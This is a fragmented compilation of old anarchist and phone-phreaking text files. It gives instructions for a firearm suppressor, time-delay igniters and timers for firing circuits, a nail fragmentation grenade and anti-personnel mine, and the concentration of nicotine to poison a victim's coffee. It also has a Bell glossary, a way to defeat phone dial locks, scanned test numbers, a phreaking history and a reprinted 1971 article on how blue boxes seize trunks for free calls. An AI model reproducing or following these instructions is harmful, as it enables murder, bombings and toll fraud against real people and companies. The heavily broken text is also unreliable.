Contai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el pipe nipple, 6 in. (15 cm) long - (see table 1 for dia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steel pipe couplings - (see table 2 for dimen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tton cloth - (see table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orbent cott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Drill hole in grenade container at both ends to fit outside diame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ipe nipple. (see table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75 in |      )                      ( &lt;-ho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Drill four rows of holes in pipe nipple. Use table 1 for diameter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tion of ho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I suck at ASCII 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6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_______________________ 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O O O O O O O O O O O O O O O O O |  | C (nom. d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ze of hole)   |                   \ / (space betw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dia.)             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Thread one of the pipe couplings on the drilled pipe nip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Cut coupling length to allow barrel of weapon to thread fully into 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gnature system. Barrel should butt against end of the drilled pi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p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Seperate the top half of the grenade container from the bottom ha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 Insert the pipe nipple in the drilled hole at the base of the bott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the container. Pack theabsorbent cotton inside the container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the pipe nip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 Pack the absorbent cotton in top half of grenade container leav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e in center. Assemble container to the bottom ha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 Thread the other coupling onto the pipe nip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A longer container and pipe nipple, with same "A" and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mensions as those given, will furthur reduce the signature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hread the low signature system on the selected weapon secur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Place the proper cotton wad size into the muzzle end of th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table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Load weap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Weapon is now ready for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1 -- Low Signature System Dimen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upling)  Holes per   (4 r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B         C         D         Row        Tot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5 cal        3/8       1/4       3/8       3/8       12           4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8 cal        3/8       1/4       1/4       1/4       12           4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 mm         3/8       1/4       1/4       1/4       12           4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62 mm        3/8       1/4       1/4       1/4       12           4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2 cal        1/4       5/32      1/8*      1/8       14           5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tra Heavy Pi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l dimensions in inc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2 -- Cotton Wadding - Siz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apon                        Cotton Wadding Siz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5 cal                       1-1/2 x 6 inc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8 cal                       1 x 4 inc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 mm                        1 x 4 inc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62 mm                       1 x 4 inc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2 cal                       Not nee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ay Igniter from a Cigarett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simple and economical (everyone wants to save money haha)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ay can be made with a common cigaret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s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garet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per ma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ng (shoelace or similar c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se cord (improvised or commerc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Cut end of fuse cord at a slant to expose inner c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Light cigarette in normal fashion. Place a paper match so that the h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over exposed exposed end of fuse cord and tie both to the side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rning cigarette with st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Position the burning cigarette with fuse so that it burns freel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ggested method is to hang the delay on a twi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Common dry cigarettes burn about 1 inch every 7 or 8 minute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ill air. (Now I am talking about all except American brands, which bu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1 inch every 4-5 minutes) If the fuse cord is place one inch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urning end of the cigarette a time delay of 7 or 8 minutes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u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elay time will vary depending upon type of cigarette, w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isture, and other atmospherc conditions (get to know your cigaret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 obtain accurate delay time, a test run should be made u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cotin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icotine is an abundant poison. Easily found in tobacc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ducts, in concentrated form a few drops can quickly k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one. Here is how to concentrat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irst get a can of chewing tobacco or pipe tobacco. Rem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ntents and soak in water overnight in a jar (about 2/3 c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water will do...). In the morning, strain into another ja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xture through a porous towel. Then wrap the towel aroun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ll of tobacco and squeeze it until all of the liquid is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r. Throw away the tobacco--you will not need it anym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w you have two options. I recommend the first. It make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cotine more pot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 Allow to evaporate until a sticky syrup results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r. This is almost pure nicotine (hell, it is pure enough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 Heat over low flame until water is evaporated and a th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icky syrup results (I don't know how long it takes... should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too long, thoug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w all you have to do, when you wish to use it, is to p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few drops in a medicine dropper or equivalent, and slip about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5 drops into the victim's coffee. Coffee is recommended sinc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l disguise the taste. Since nicotine is a drug, the vict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uld get quite a buzz before they turn their toes up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isies, so to spea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te: If the syrup is too sticky, dilute it with a few dro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water. And while you are at it, better add an extra drop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ffee just to be s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ed Seed Timer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time delay device for electrical firing circuits can be made u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rinciple of expansion of dried see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ed peas, beans, or oter dehydrated s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mouth glass jar with non-metal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screws or bol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 metal pl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 dr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ewdri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Determine the rate of the rise of the dried seeds selected. This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cessary to determine the delay time of the ti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Place a sample of the dried seeds in the jar and cover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 Measure the time it takes for the seeds to rise a given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st dried seeds increase 50% in one to two hou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Cut a disc from thin metal plate. Disc should fit loosely insid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If metal is painted, rusty, or otherwise coated, it must be scrap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anded to obtain a clean metal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Drill two holes in the cap of the jar about 2 inches apart. Diame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holes should be such that screws or bolts will thread tightly in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m. If the jar has a metal cap or no cap, a piece of wood or plas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METAL) can be used as a c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Turn the two screws or bolts through the holes in the cap. B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extend about one in. (2 1/2 cm) into the j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ANT: Both bolts must extend the same distance below the contain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Pour dried seeds into the container. The level will depend up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ly measured rise time and the desired de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Place the metal disc in the jar on top of the see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Add just enough water to completely cover the seeds and place the ca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j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Attach connecting wires from the firing circuit to the two screws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pansion of the seeds will raise the metal disc until it contact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ews and closes the circ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il Grenad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Effective fragmentation grenades can be made from a block of tnt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blasting explosive and nai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 of TNT or other blasting explos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i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electric (military or improvised) blasting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se C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pe, string, wire, or g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If an explosive charge other than a standard TNT block is used, make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le in the center of the charge for inserting the blasting cap. TNT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drilled with relative safety. With plastic explosives, a hole can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de by pressing a round stick into the center of the charge. The ho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uld be deep enough that the blasting cap is totally with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os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Tape, tie, or glue one or two rows of closely packed nails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des of the explosive block. Nails should completely cover the f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s of the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Place blasting cap on one end of the fuse cord and crimp with pli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To find out how long the fuse cord should be, check the tim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s a known length to burn. If 12 inches (30 cm) burns for 30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10 second delay will require a 4 inch (10 cm) f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Insert the blasting cap in the hole in the block of explosive. Tape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e fuse cord securly in place so that it will not fall out whe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nade is thr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ernate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 effective directional anti-personnel mine can be made by placing nai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only one side of the explosive block. For thi case, and electr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sting cap can be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ell Glossary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Bell Glossary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     /\&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gt;\&gt;ad &lt;/\&gt;\&gt;arv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D: Automatic Call Distributor - A system that automatically distributes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perator pools (providing services such as intercept and direc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istance), to airline ticket agent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nistration: The tasks of record-keeping, monitoring, rearrang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diction need for growth,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S: Automatic Intercept System - A system employing an audio-response u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 control of a processor to automatically provide pertinent info to call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ted to intercep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ert: To indicate the existence of an incoming call, (ring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I: Automatic Number Identification - Often pronounced "Annie," a facility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matically identify the number of the calling party for charging purpo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earance: A connection upon a network terminal, as in "the line has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appearan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end: The operation of monitoring a line or an incoming trunk for off-hook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izure, respective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dible: The subdued "image" of ringing transmitted to the calling party du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ging; not derived from the actual ringing signal in later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bone Route: The route made up of final-group trunks between end office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erent regional center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HC: Busy Hour Calls - The number of calls placed in the busy hou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ing: The ratio of unsuccessful to total attempts to use a fac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resses as a probability when computed a prior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ing Network: A network that, under certain conditions, may be unabl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 a transmission path from one end of the network to the other. In gen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networks used within the Bell Systems are of the blocking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 Equipment used fraudulently to synthesize signals, gaining acces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oll network for the placement of calls without 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RSCHT Circuit: A name for the line circuit in the central offic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s as a mnemonic for the functions that must be performed b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rcuit: Battery, Overvoltage, Ringing, Supervision, Coding, Hybri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y Signal: (Called-line-busy) An audible signal which, in the Bell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rises 480hz and 620hz interrupted at 60IP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link: A special high-speed means used in crossbar equipment for routing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oming from a step-by-step office. Trunks from such offices are oft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erred to as "bylink" trunks even when incoming to noncrossbar offices;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more properly referred to as "dc incoming trunks." Such high-speed me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necessary to assure that the first incoming pulse is not lo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ble Vault: The point which phone cable enters the Central Office buil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A: Centralized Automatic Message Accounting - Pronounced like Alabam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CIS: Common Channel Interoffice Signaling - Signaling information for tru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ons over a separate, nonspeech data link rather that over the trun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sel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CITT: International Telegraph and Telephone Consultative Committee-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committee that formulates plans and sets standard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country communication mea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DO: Community Dial Office - A small usually rural office typically served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by-step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 Central Office - Comprises a switching network and its control and supp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ment. Occasionally improperly used to mean "office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rex: A service comparable in features to PBX service but implemented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Centrex CU) or all (Centrex CO) of the control in the central offic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ater case, each station's loop connects to the central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stomer Loop: The wire pair connecting a customer's station to the cent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DD: Direct Distance Dialing - Dialing without operator assistance ov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ionwide intertoll ne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 Trunk Group: A trunk group that is a direct connection between a gi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iginating and a given terminating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OTT: End Office Toll Trunking - Trunking between end offices in different to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er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B: Emergency Service Bureau - A centralized agency to which 911 "univers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ergency calls are rou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S: Electronic Switching System - A generic term used to identify as a cl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ed-program switching systems such as the Bell System's No.1 No.2, No.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4, or No.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S: Electronic Translation Systems - An electronic replacement for the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lator in 4A Crossbar systems. Makes use of the SPC 1A Proces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se Start: An aborted dialing attemp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st Busy: (often called reorder) - An audible busy signal interrupted at tw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ate of the normal busy signal; sent to the originating station to indic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 call blocked due to busy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al Trunk Group: The trunk group to which calls are routed when avail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usage trunks overflow; these groups generally "home" on an office n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est in the hierarch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 Group: A trunk group that does not permit rerouting off-contingent foreig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ffic; there are seven such off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re: The situation that occurs when a two-way trunk is seized more or l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ultaneously at both e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 Usage Trunk Group: The appellation for a trunk group that has altern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tes via other similar groups, and ultimately via a final trunk group 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er ranking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cept: The agency (usually an operator) to which calls are routed when m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 line recently removed from a service, or in some other category requi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nation. Automated versions (ASI) with automatic voiceresponse unit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wing in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rupt: The interruption on a phone line to disconnect and connect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station, such as an Emergence Interrup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nctor: A wire or circuit connection between networks in the same offic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al equivalent to an intraoffice trun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F: Multifrequency - The method of signaling over a trunk making us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ultaneous application of two out of six possible frequenc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PA: Numbering Plan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I: Operator Number Identification - The use of an operator in a CAMA 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verbally obtain the calling number of a call originating in an office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ped with AN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X: Private Branch Exchange - (PABX: Private Automatic Branch Exchange)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office serving a private customer, Typically , access to the out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network is provi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anent Signal: A sustained off-hook condition without activity (no dia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ringing or completed connection); such a condition tends to tie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ment, especially in earlier systems. Usually accidental, but someti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intentionally by customers in high-crime-rate areas to thwart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rgla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S: Plain Old Telephone Service - Basic service with no extra "fri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TL: Remote Office Test Line - A means for remotely testing trun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A: Remote Trunk Arrangement - An extension to the TSPS system permitting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s to be provided up to 200 miles from the TSPS s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F: Single Frequency. A signaling method for trunks: 2600hz is impressed up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le trun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ervise: To monitor the status of a c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xS: (Step-by-Step or Strowger switch) - An electromechanical office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tilizing a gross-motion stepping switch as a combination network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tributed contr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off: The phenomenon of accidental synthesis of a machine-intelligi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 by human voice causing an unintended response. "whistling a t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nk: A path between central offices; in general 2-wire for interlocal, 4-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interto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SPS: Traffic Service Position System - A system that provides, under sto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control, efficient operator assistance for toll calls. It doe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 the customer, but provides a bridge connection to th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bar: (Crossbar) - An electromechanical office type utilizing a "fine-mo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ordinate switch and a multiplicity of central controls (called mark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four varie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1 Crossbar: Used in large urban office application; (19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 3 Crossbar: A small system started in (197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4A/4M Crossbar: A 4-wire toll machine; (194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5 Crossbar: A machine originally intended for relatively sm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burban applications; (194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rossbar Tandem: A machine used for interlocal office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Dial Locks -- How to Beat'em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ve you ever been in an office or somewhere and wanted to make a fre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but some asshole put a lock on the phone to prevent out-going calls? Fr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more phellow phreake, for every system can be beaten with a little knowled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re are two ways to beat this obstacle, first pick the lock, I don't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ime to teach locksmithing so we go to the second method which tak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vantage of telephone electroni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 be as simple as possibnle when you pick up the phone you complete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rcuit known as a local loop. When you hang up you break the circuit.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ial (pulse) it also breaks the circuit but not long enough to hang up!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Push-dial."  To do this you &gt;&gt;&gt; RAPIDLY &lt;&lt;&lt; depress the switchh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xample, to dial an operator (and then give her the number you want to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gt; RAPIDLY &lt;&lt;&lt; &amp; &gt;&gt;&gt; EVENLY &lt;&lt;&lt; depress the switchhook 10 times.  To d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34-1268, depress 6 X'S pause, then 3 X'S, pause, then 4X'S, etc.  It take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tle practice but you'll get the hang of it.  Try  practicing with your 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ll get a busy tone when right.  It'll also work on touch-tone(tm) si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DTMF line will also accept pulse.  Also, never depress the switchhook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than a second or it'll hang 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inally, remember that you have just as much right to that phone a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hole who put the lock on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the Official Phreaker's Gu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hange Scanning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most every exchange in the bell system has test #'s and other "good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ch as loops with dial-ups. These "goodies" are usually found betweed 99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9999 in your local exchange.  If you have the time and initiative, s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exchange and you may become luck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are some findings in the 914-268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9900 - AN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9901 - AN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27 - OSC. TONE (POSSIBLE TONE SIDE OF A LO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36 - VOICE # TO THE TELCO CENTRAL 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37 - VOICE # TO THE TELCO CENTRAL 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41 - COMPUTER (DIGITAL VOICE TRANSMIS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60 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME EXCHAN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61 - NO RESPONSE (OTHER END OF LO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62 - NO RESPONSE (OTHER END OF LO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63 - NO RESPONSE (OTHER END OF LO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66 - COMPUTER (SEE 994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968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE K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st of the numbers between 9900 &amp; 9999 will ring or go to a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the Official Phreaker's Manu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hort History of Phreaking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ll now we know a little vocabulary, and now its into history, Phr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tory.  Back at MIT in 1964 arrived a student by the name of Stewart Nel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 was extremely interested in the telephone.  Before entering MIT, he h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ilt autodialers, cheese boxes, and many more gadgets.  But when he cam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T he became even more interested in "fone-hacking" as they called it.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ittle while he naturally started using the PDP-1, the schools computer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ime, and from there he decided that it would be interesting to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ther the computer could generate the frequencies required for blue box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ackers at MIT were not interested in ripping off Ma Bell, but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oring the telephone network.  Stew (as he was called) wrote a program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erate all the tones and set off into the vast net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w there were more people phreaking than the ones at MIT.  Most people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rd of Captain Crunch (No not the cereal), he also discovered how to t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des through the fone system, with the aid of a small whistle found i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eal box (can we guess which one?).  By blowing this whistle, he gener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agical 2600hz and into the mouthpiece it sailed, giving him comple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ol over the system.  I have heard rumors that at one time he made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4 of the calls coming out of San Francisco.  He got famous fast.  He mad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ver of people magazine and was interviewed several times (as you'll so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Well he finally got caught after a long adventurous career.  After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caught he was put in jail and was beaten up quite badly because he w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teach other inmates how to box calls.  After getting out, he joined Ap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and is still out there some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n there was Joe the Whistler, blind form the day he was born.  He c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stle a perfect 2600hz tone.  It was rumored phreaks used to call him to t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r bo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ll that was up to about 1970, then from 1970 to 1979, phreaking was mai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e by college students, businessmen and anyone who knew enough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s and the fone company to make a 555 Ic to generate those mag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nes.  Businessmen and a few college students mainly just blue box to get f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s.  The others were still there, exploring 800#'s and the new ESS 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S posed a big problem for phreaks then and even a bigger one now.  ESS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widespread, but where it was, blue boxing was next to impossible except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experienced phreak.  Today ESS is installed in almost all major c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lue boxing is getting harder and har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978 marked a change in phreaking, the Apple ][, now a computer that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fordable, could be programmed, and could save all that precious work o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sette.  Then just a short while later came the Apple Cat modem.  With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m, generating all blue box tones was easy as writing a program to cou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 one to ten (a little exaggerated).  Pretty soon programs that c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itate an operator just as good as the real thing were hitting the commun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SPS and Cat's Meow, are the standard now and are the b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982-1986: LD services were starting to appear in mass numbers.  People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d programs to hack LD services, telephone exchanges, and even passwords.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many phreaks were getting extremely good and BBS's started to spring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where, each having many documentations on phreaking for the novice.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happened, the movie War Games was released and mass numbers of sixth gr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ll ages flocked to see it.  The problem wasn't that the movie was ba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that now EVERYONE wanted to be a hacker/phreak.  Novices came out in s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s numbers, that bulletin boards started to be busy 24 hours a day.  To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y, they still have not recovered.  Other problems started to occur, nov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uessed easy passwords on large government computers and started to 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Well it wasn't long before they were caught, I think that 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remember the 414-hackers.  They were so stupid as to say "yes" whe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asked them whether they'd like to play games.  Well at least it tak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eat off the real phreaks/hacker/krack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the Official Phreaker's Manu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 Courtesy of the Jolly Roger&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AAG Proudly Presents The AAG Proudly Pres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Secrets of the Little Blue Bo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y Ron Rosenba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yped by One Farad Cap/A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 story so incredible it may even mak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feel sorry for the phone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First of four fi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AAG Proudly Presents The AAG Proudly Pres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des... These four files contain the story, "Secrets of the Little Blu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Ron Rosenba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ory so incredible it may even make you feel sorry for the phone compan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nted in the October 1971 issue of Esquire Magazine.  If you happen to b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ibrary and come across a collection of Esquire magazines, the October 197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sue is the first issue printed in the smaller format.  The story begin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116 with a picture of a blu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e Farad Cap, Atlantic Anarchist Gui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lue Box Is Introduced: Its Qualities Are Remark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in the expensively furnished living room of Al Gilbertson (His real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s been changed.), the creator of the "blue box." Gilbertson is holding on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shiny black-and-silver "blue boxes" comfortably in the palm of his h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nting out the thirteen little red push buttons sticking up from the cons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is dancing his fingers over the buttons, tapping out discordant beep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 jingles.  He is trying to explain to me how his little blue box d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less than place the entire telephone system of the world, satelli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bles and all, at the service of the blue-box operator, free of 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s what it does.  Essentially it gives you the power of a super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eize a tandem with this top button," he presses the top button with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ex finger and the blue box emits a high-pitched cheep, "and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ep goes the blue box again -- "you control the phone company's long-di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systems from your cute little Princes phone or any old pay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ve got anonymity.  An operator has to operate from a definite lo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one company knows where she is and what she's doing.  But with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per box, once you hop onto a trunk, say from a Holiday Inn 800 (toll-f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they don't know where you are, or where you're coming from, they do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how you slipped into their lines and popped up in that 800 number.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even know anything illegal is going on.  And you can obscure your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as many levels as you like.  You can call next door by way of Wh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ins, then over to Liverpool by cable, and then back here by satellit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call yourself from one pay phone all the way around the world to a p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next to you.  And you get your dime back to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y can't trace the calls?  They can't charg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if you do it the right way.  But you'll find that the free-call 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really as exciting at first as the feeling of power you get from hav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se babies in your hand.  I've watched people when they first get h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one of these things and start using it, and discover they can m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ons, set up crisscross and zigzag switching patterns back and fo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ross the world.  They hardly talk to the people they finally reach.  They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and start thinking of what kind of call to make next.  They go a li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  He looks down at the neat little package in his palm.  His finger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ll dancing, tapping out beeper patter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t's something to do with how small my models are.  There are lot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es around, but mine are the smallest and most sophistic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ally.  I wish I could show you the prototype we made for our bi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ndicate or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ighs.  "We had this order for a thousand beeper boxes from a syndic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nt man in Las Vegas.  They use them to place bets coast to coast, keep l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for hours, all of which can get expensive if you have to pay.  The de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a thousand blue boxes for $300 apiece. Before then we retailed them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500 apiece, but $300,000 in one lump was hard to turn down.  We ha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ufacturing deal worked out in the Philippines.  Everything ready to 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way, the model I had ready for limited mass production was small enough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t inside a flip-top Marlboro box.  It had flush touch panels for a key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her than these unsightly buttons, sticking out.  Looked just like a ti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able radio.  In fact, I had designed it with a tiny transistor receiv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one AM channel, so in case the law became suspicious the owner could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radio part, start snapping his fingers, and no one could tell an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egal was going on. I thought of everything for this model -- I had it li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 band of thermite which could be ignited by radio signal from a ti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ton transmitter on your belt, so it could be burned to ashes instantly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 of a bust.  It was beautiful.  A beautiful little machine.  You sh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seen the faces on these syndicate guys when they came back after trying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They'd hold it in their palm like they never wanted to let it go,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d say, 'I can't believe it.  I can't believe it.'  You probably wo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 it until you try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lue Box Is Tested: Certain Connections Are Ma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eleven o'clock two nights later Fraser Lucey has a blue box in the pal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his left hand and a phone in the palm of his right.  He is standing insid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booth next to an isolated shut-down motel off Highway 1.  I am stan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side the phone boo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ser likes to show off his blue box for people.  Until a few weeks ago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cific Telephone made a few arrests in his city, Fraser Lucey liked to b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blue box (This particular blue box, like most blue boxes, is not b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es have come to be called "blue boxes" either because 1) The first b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 ever confiscated by phone-company security men happened to be blue, or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istinguish them from "black boxes."  Black boxes are devices, usually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stor in series, which, when attached to home phones, allow all incom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s to be made without charge to one's caller.) to parties.  It never fa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w cheeps from his device and Fraser became the center of attention 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y hippest of gatherings, playing phone tricks and doing request number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urs.  He began to take orders for his manufacturer in Mexico.  He becam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ser is cautious now about where he shows off his blue box.  But he n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s tired of playing with it.  "It's like the first time every time," he te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ser puts a dime in the slot.  He listens for a tone and holds the recei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to my ear.  I hear the tone. Fraser begins describing, with a cer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acticed air, what he does while he does it. "I'm dialing an 800 number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800 number will do.  It's toll free. Tonight I think I'll use the -----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mes a well-know rent-a-car company) 800 number.  Listen, It's ring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ar it?  Now watch."  He places the blue box over the mouthpiec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so that the one silver and twelve black push buttons are facing up tow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He presses the silver button -- the one at the top -- and I hear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pitched beep. "That's 2600 cycles per second to be exact," says Luc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quick. listen."  He shoves the earpiece at me.  The ringing has vanish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ne gives a slight hiccough, there is a sharp buzz, and then nothing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ft white noi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home free now," Lucey tells me, taking back the phone and apply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 to its mouthpiece once again.  "We're up on a tandem, in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lines trunk.  Once you're up on a tandem, you can send yourself any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ant to go."  He decides to check out London first.  He chooses a cer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y phone located in Waterloo Station.  This particular pay phone is popul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phone-phreaks network because there are usually people walking by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hours who will pick it up and talk for a wh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presses the lower left-hand corner button which is marked "KP" on the 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box. "That's Key Pulse.  It tells the tandem we're ready to giv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ructions.  First I'll punch out KP 182 START, which will slide us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seas sender in White Plains."  I hear a neat clunk-cheep.  "I think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 over to England by satellite. Cable is actually faster and the conn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somewhat better, but I like going by satellite.  So I just punch out KP Zer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4.  The Zero is supposed to guarantee a satellite connection and 44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try code for England.  Okay... we're there.  In Liverpool actually.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have to do is punch out the London area code which is 1, and dial up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y phone.  Here, listen, I've got a ring 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 the soft quick purr-purr of a London ring.  Then someone picks up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says the London vo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Who's this?" Fraser as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There's actually nobody here.  I just picked this up while I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ing by.  This is a public phone.  There's no one here to answer actual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Don't hang up.  I'm calling from the United St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What is the purpose of the call?  This is a public phone you k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know.  To check out, uh, to find out what's going on in London.  H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it t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ive o'clock in the morning.  It's raining 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Who are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ndon passerby turns out to be an R.A.F. enlistee on his way back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e in Lincolnshire, with a terrible hangover after a thirty-six-hour p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and Fraser talk about the rain.  They agree that it's nicer when it'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ning.  They say good-bye and Fraser hangs up.  His dime returns with a n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n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far out," he says grinning at me.  "London, like th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ser squeezes the little blue box affectionately in his palm.  "I told y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hing is for real.  Listen, if you don't mind I'm gonna try this girl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in Paris.  I usually give her a call around this time.  It freaks her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ime I'll use the ------ (a different rent-a-car company) 800 numb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go by overseas cable, 133; 33 is the country code for France, the 1 se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by cable.  Okay, here we go.... Oh damn.  Busy.  Who could she be tal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t this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ate police car cruises slowly by the motel.  The car does not stop,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ser gets nervous.  We hop back into his car and drive ten miles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posite direction until we reach a Texaco station locked up for the night.  W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 up to a phone booth by the tire pump. Fraser dashes inside and tri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is number.  It is busy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understand who she could be talking to.  The circuits may be bus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oo bad I haven't learned how to tap into lines overseas with this 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ser begins to phreak around, as the phone phreaks say.  He dials a lea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ionwide charge card's 800 number and punches out the tones that bring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ime recording in Sydney, Australia.  He beeps up the weather recording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me, in Italian of course.  He calls a friend in Boston and talks abou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ain over-the-counter stock they are into heavily.  He finds the Par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busy again.  He calls up "Dial a Disc" in London, and we listen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uble Barrel by David and Ansil Collins, the number-one hit of the week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don.  He calls up a dealer of another sort and talks in code.  He calls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Engressia, the original blind phone-phreak genius, and pays his respec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other calls.  Finally Fraser gets through to his young lady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oth agree the circuits must have been busy, and criticize the Par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system.  At two-thirty in the morning Fraser hangs up, pockets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me, and drives off, steering with one hand, holding what he calls his "lov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tle blue box" in the o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Call Long Distance For Less Than You Thin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ee, a few years ago the phone company made one big mistake," Gilbert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ins two days later in his apartment.  "They were careless enough to l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technical journal publish the actual frequencies used to create all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lti-frequency tones.  Just a theoretical article some Bell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oratories engineer was doing about switching theory, and he listed the t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passing.  At ----- (a well-known technical school) I had been fooling a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phones for several years before I came across a copy of the journal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gineering library.  I ran back to the lab and it took maybe twelve hours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ime I saw that article to put together the first working blue box.  It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ger and clumsier than this little baby, but it work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ll there on public record in that technical journal written mainly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 Lab people for other telephone engineers.  Or at least it was publ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ry and get a copy of that issue at some engineering-school library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 has had them all red-tagged and withdrawn from circulation," Gilbert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s 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s too late.  It's all public now.  And once they became public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ology needed to create your own beeper device is within the range o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elve-year-old kid, any twelve-year-old blind kid as a matter of fact.  And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do it in less than the twelve hours it took us.  Blind kids do it a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hey can't build anything as precise and compact as my beeper box,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rs can do anything mine can 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ay.  About twenty years ago A.T.&amp;T. made a multi-billion-dollar decision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e its entire long-distance switching system on twelve electronic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erated combinations of twelve master tones. Those are the tone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imes hear in the background after you've dialed a long-distanc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decided to use some very simple tones -- the tone for each number is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fixed single-frequency tones played simultaneously to create a certain be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quency.  Like 1300 cycles per second and 900 cycles per second play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gether give you the tone for digit 5.  Now, what some of these phone phrea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done is get themselves access to an electric organ.  Any cheap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e-entertainment organ.  Since the frequencies are public knowledge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blind phone phreak has even had them recorded in one of the talking boo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blind -- they just have to find the musical notes on the organ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respond to the phone tones.  Then they tape them.  For instance, to get M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s tone for the number 1, you press down organ keys F~5 and A~5 (900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 cycles per second) at the same time.  To produce the tone for 2 it's F~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6 (1100 and 700 c.p.s).  The phone phreaks circulate the whole lis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so there's no trial and error anym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hows me a list of the rest of the phone numbers and the two electric org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s that produce th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ually, you have to record these notes at 3 3/4 inches-per-second tape sp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double it to 7 1/2 inches-per-second when you play them back, to ge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per tones," he ad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once you have all the tones recorded, how do you plug them into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hey take their organ and their cassette recorder, and start banging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ire phone numbers in tones on the organ, including country codes, rou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ructions, 'KP' and 'Start' tones.  Or, if they don't have an organ, some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phone-phreak network sends them a cassette with all the tones recor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 voice saying 'Number one,' then you have the tone, 'Number two,'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one and so on.  So with two cassette recorders they can put together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ies of phone numbers by switching back and forth from number to number.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iot in the country with a cheap cassette recorder can make all the free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w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ean you just hold the cassette recorder up the mouthpiece and switch i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ies of beeps you've recorded?  The phone thinks that anything that mak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tones must be its own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As long as you get the frequency within thirty cycles per second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one company's tones, the phone equipment thinks it hears its own vo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to it.  The original granddaddy phone phreak was this blind kid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fect pitch, Joe Engressia, who used to whistle into the phone.  An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ell the difference between his whistle and the phone compan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 tone generator, but the phone company's switching circuit can't t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 apart.  The bigger the phone company gets and the further away from hu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s it gets, the more vulnerable it becomes to all sorts of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Guide for the Perplex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ait a minute," I stop Gilbertson.  "If everything you do sounds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company equipment, why doesn't the phone company charge you for the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y it charges its own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ay.  That's where the 2600-cycle tone comes in.  I better start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in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eginning he describes for me is a vision of the phone system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inent as thousands of webs, of long-line trunks radiating from each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ndreds of toll switching offices to the other toll switching offices.  Ea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ll switching office is a hive compacted of thousands of long-distance tand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tantly whistling and beeping to tandems in far-off toll switching off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andem is the key to the whole system.  Each tandem is a line with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ys with the capability of signalling any other tandem in any other to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office on the continent, either directly one-to-one or by programm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roundabout route through several other tandems if all the direct rout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y.  For instance, if you want to call from New York to Los Angele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ffic is heavy on all direct trunks between the two cities, your tandem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York is programmed to try the next best route, which may send you down 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ndem in New Orleans, then up to San Francisco, or down to a New Orle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ndem, back to an Atlanta tandem, over to an Albuquerque tandem and finally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Los Ange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a tandem is not being used, when it's sitting there waiting for someon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a long-distance call, it whistles.  One side of the tandem, the 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cing" your home phone, whistles at 2600 cycles per second toward a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e phones serviced by the exchange, telling them it is at their ser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they be interested in making a long-distance call.  The other sid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andem is whistling 2600 c.p.s. into one or more long-distance trunk l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ing the rest of the phone system that it is neither sending nor receiving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through that trunk at the moment, that it has no use for that trunk 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dial a long-distance number the first thing that happens is that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hooked into a tandem.  A register comes up to the side of the tandem fac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ay from you and presents that side with the number you dialed.  This sen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de of the tandem stops whistling 2600 into its trunk line.  When a tand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ps the 2600 tone it has been sending through a trunk, the trunk is sai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seized," and is now ready to carry the number you have dialed -- conver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multi-frequency beep tones -- to a tandem in the area code and cent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you wa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when a blue-box operator wants to make a call from New Orleans to New Y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tarts by dialing the 800 number of a company which might happen to have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quarters in Los Angeles.  The sending side of the New Orleans tandem sto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ing 2600 out over the trunk to the central office in Los Angeles, there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izing the trunk.  Your New Orleans tandem begins sending beep tones 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ndem it has discovered idly whistling 2600 cycles in Los Angel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iving end of that L.A. tandem is seized, stops whistling 2600, listen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eep tones which tell it which L.A. phone to ring, and starts ring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 number.  Meanwhile a mark made in the New Orleans office accounting t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hat a call from your New Orleans phone to the 800 number in L.A.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n initiated and gives the call a code number. Everything is routine so f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n the phone phreak presses his blue box to the mouthpiece and push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00-cycle button, sending 2600 out from the New Orleans tandem to the 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ndem.  The L.A. tandem notices 2600 cycles are coming over the line agai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umes that New Orleans has hung up because the trunk is whistling as if i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A. tandem immediately ceases ringing the L.A. 800 number.  But as soon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reak takes his finger off the 2600 button, the L.A. tandem assum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nk is once again being used because the 2600 is gone, so it listens for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series of digit tones - to find out where it must send the c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us the blue-box operator in New Orleans now is in touch with a tandem in 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is waiting like an obedient genie to be told what to do nex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box owner then beeps out the ten digits of the New York number which t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A. tandem to relay a call to New York City.  Which it promptly does.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n as your party picks up the phone in New York, the side of the New Orle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ndem facing you stops sending 2600 cycles to you and stars carrying his vo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you by way of the L.A. tandem.  A notation is made on the accounting t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 connection has been made on the 800 call which had been initiate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d earlier.  When you stop talking to New York a notation is made t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0 call has en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ree the next morning, when the phone company's accounting computer sta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ing back over the master accounting tape for the past day, it record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call of a certain length of time was made from your New Orleans home to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800 number and, of course, the accounting computer has been train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gnore those toll-free 800 calls when compiling your monthly bi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y can prove is that you made an 800 toll-free call," Gilberts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entor concludes.  "Of course, if you're foolish enough to talk for two hou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n 800 call, and they've installed one of their special anti-fraud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s to watch out for such things, they may spot you and ask why you t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hours talking to Army Recruiting's 800 number when you're 4-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f you do it from a pay phone, they may discover something peculia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 day -- if they've got a blue-box hunting program in their computer --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ll be a long time gone from the pay phone by then.  Using a pay phon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most guaranteed saf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about the recent series of blue-box arrests all across the country --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rk, Cleveland, and so on?" I asked.  "How were they caught so easi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what I can tell, they made one big mistake: they were seizing trun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an area code plus 555-1212 instead of an 800 number. Using 555 is eas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ct because when you send multi-frequency beep tones of 555 you get a ch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it on your tape and the accounting computer knows there's something wr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t tries to bill you for a two-hour call to Akron, Ohio, informatio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drops a trouble card which goes right into the hands of the security ag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y're looking for blue-box us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ever sold those guys their blue boxes didn't tell them how to use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perly, which is fairly irresponsible.  And they were fairly stupid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 at home all the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hat those arrests really mean is than an awful lot of blue box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oding into the country and that people are finding them so easy to mak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know how to make them before they know how to use them.  Ma Bell i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ou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f a blue-box operator or a cassette-recorder phone phreak sticks to p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s and 800 numbers, the phone company can't stop th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unless they change their entire nationwide long-lines technology,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ake them a few billion dollars and twenty years.  Right now they can't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ing.  They're screw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tain Crunch Demonstrates His Famous Un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n underground telephone network in this country.  Gilbert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overed it the very day news of his activities hit the papers. That eve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phone began ringing.  Phone phreaks from Seattle, from Florida, from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rk, from San Jose, and from Los Angeles began calling him and telling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the phone-phreak network.  He'd get a call from a phone phreak who'd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but, "Hang up and call this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dialed the number he'd find himself tied into a conference of a doz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phreaks arranged through a quirky switching station in British Columb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identified themselves as phone phreaks, they demonstrated their homem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es which they called "M-Fers" (for "multi-frequency," among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for him, they talked shop about phone-phreak devices.  They let him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ir secrets on the theory that if the phone company was after him he m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trustworthy.  And, Gilbertson recalls, they stunned him with their techni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phist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sk him how to get in touch with the phone-phreak network.  He digs a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a file of old schematics and comes up with about a dozen number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ee widely separated area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se are the centers," he tells me.  Alongside some of the numbers he wri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first names or nicknames: names like Captain Crunch, Dr. No, Frank Car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a code word for a 